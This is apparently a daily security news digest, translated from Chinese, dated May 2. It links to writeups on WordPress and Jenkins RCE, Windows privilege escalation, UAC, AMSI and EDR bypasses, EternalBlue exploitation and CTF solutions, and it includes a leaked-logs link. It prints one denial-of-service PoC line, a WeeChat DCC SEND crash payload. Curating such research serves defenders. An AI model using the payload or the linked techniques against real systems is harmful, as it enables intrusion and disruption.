[Knowledge] May 2 - Daily Security Knowledge Hotspots


Hot topics summary: WordPress Core - RCE PoC Exploit (video), no plugins or authentication required; Android application reversing 101; summary of Windows privilege escalation approaches; privilege escalation vulnerability in systems with Intel® AMT, Intel® SBA, or Intel® ISM capabilities; Apple iOS 10.3 Control Panel denial of service vulnerability; details and PoC of the deserialization RCE vulnerability patched in Jenkins last week; Malicious sample analysis manual (tools); summary of UAC bypass research; Mehdi Talbi & Paul Fariello – VM escape – QEMU Case Study

Domestic hot topics (some of the following content is taken from http://www.solidot.org/):


Remote code execution vulnerability disclosed in WordPress Core

After failing to extort Netflix, hackers release unaired episodes

UK cracks the terror attacker's encrypted WhatsApp messages

Russian telecom company hijacks network traffic of financial services

News:


Apple revokes the certificate used by the OSX/Dok malware

https://threatpost.com/apple-revokes-certificate-used-by-osxdok-malware/125322/

Because Netflix did not pay the ransom, hackers threaten to leak more shows

http://thehackernews.com/2017/04/Orange-is-the-new-black-season-5-episodes.html

Technical:


WordPress Core - RCE PoC Exploit (video), no plugins or authentication required

https://youtu.be/ZFt_S5pQPX0

Comparing the relationship between the "port 81 botnet" and MIRAI

http://blog.netlab.360.com/the_difference_between_http81_botnet_and_mirai/

Android application reversing 101

https://www.evilsocket.net/2017/04/27/Android-Applications-Reversing-101/

Intranet security: using NSA Smbtouch for batch detection across the internal network

https://3gstudent.github.io/3gstudent.github.io/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%88%A9%E7%94%A8NSA-Smbtouch%E6%89%B9%E9%87%8F%E6%A3%80%E6%B5%8B%E5%86%85%E7%BD%91/

Mehdi Talbi & Paul Fariello – VM escape – QEMU Case Study

http://www.phrack.org/papers/vm-escape-qemu-case-study.html

Summary of Windows privilege escalation approaches

http://blog.mokirin.com/2017/04/27/windows%E6%8F%90%E6%9D%83%E6%80%9D%E8%B7%AF%E6%80%BB%E7%BB%93/

Summary of iOS lock screen bypass vulnerabilities

http://blog.dinosec.com/2014/09/bypassing-ios-lock-screens.html

Writing high-quality Windows shellcode

https://dimitrifourny.github.io/2017/04/28/optimized-windows-shellcode/

CVE-2017-8073 PoC: remote crash in WeeChat before 1.7.1

/exec -o /bin/echo -e "\x01DCC SEND " 1.2.3.4 1337 1\x01


Yahoo pays $7,000 for a Flickr account takeover vulnerability (three vulnerabilities chained together)

http://blog.mish.re/index.php/2017/04/29/yahoo-bug-bounty-chaining-3-minor-issues-to-takeover-flickr-accounts/

Apple iOS 10.3 Control Panel denial of service vulnerability

https://www.vulnerability-lab.com/get_content.php?id=2059

Fifteen ways to break RSA security

https://github.com/comaeio/OPCDE/blob/master/15_ways_to_break_RSA_Security/opcde2017-ds-lifchitz-break_rsa.pdf

Summary of UAC bypass research

https://www.peerlyst.com/posts/wiki-uac-bypasses-and-uac-bypass-research-nic-cancellari

Exploiting the .NET managed DCOM object model

https://googleprojectzero.blogspot.in/2017/04/exploiting-net-managed-dcom.html

Privilege escalation vulnerability in systems with Intel® AMT, Intel® SBA, or Intel® ISM capabilities

https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr

defcon 2017 liberty writeup

https://github.com/deroko/liberty

A vulnerability information search site

https://vulners.com/

How to use Nmap and Meterpreter together

http://www.blackhillsinfosec.com/?p=5897

Details and PoC of the deserialization RCE vulnerability patched in Jenkins last week

https://blogs.securiteam.com/index.php/archives/3171

Android Security Bulletin, May 2017

https://source.android.com/security/bulletin/2017-05-01

UIUCTF 2017 – ZippyPic Writeup

https://jbzteam.github.io/web/UIUC2017-ZippyPics

AMSI bypass via COM hijacking

https://gist.githubusercontent.com/enigma0x3/00990303951942775ebb834d5502f1a6/raw/783a9b43f52f8f65f30edea707c79d9914b6f6f5/amsi_bypass.reg

DLL injection using LoadLibrary in C

https://arvanaghi.com/blog/dll-injection-using-loadlibrary-in-C/

Outlook: from forms to shells

https://sensepost.com/blog/2017/outlook-forms-and-shells/

Analysis of the arbitrary file read vulnerability in the Sanic web framework

https://mp.weixin.qq.com/s?__biz=MzIxODIzNzgwMw==&mid=2654056186&idx=1&sn=ae10828fcc1a0308e2563367e709c85d

Malicious sample analysis manual: tools

http://blog.nsfocus.net/malicious-sample-analysis-manual-tool-1/

http://blog.nsfocus.net/malicious-sample-analysis-manual-tool-2/

HookCase is a tool for debugging and reverse engineering applications on macOS

https://github.com/steven-michaud/HookCase

Running programs via Proxy & jumping on a EDR-bypass trampoline

http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/

Bypassing Windows Attachment Manager

http://www.rvrsh3ll.net/blog/informational/bypassing-windows-attachment-manager/

DEFCON CTF QUALIFIERS 2017 – Crackme 2000

https://github.com/sinfocol/ctfs/tree/master/writeups/2017/defcon-qualifiers/crackme-2000

Access logs leaked from leakbase.pw

http://siph0n.net/exploits.php?id=4976

Exploiting remote Windows PCs with the EternalBlue and DoublePulsar exploit in Metasploit

http://www.hackingarticles.in/exploit-remote-windows-pc-eternalblue-doublepulsar-exploit-metasploit/

(End)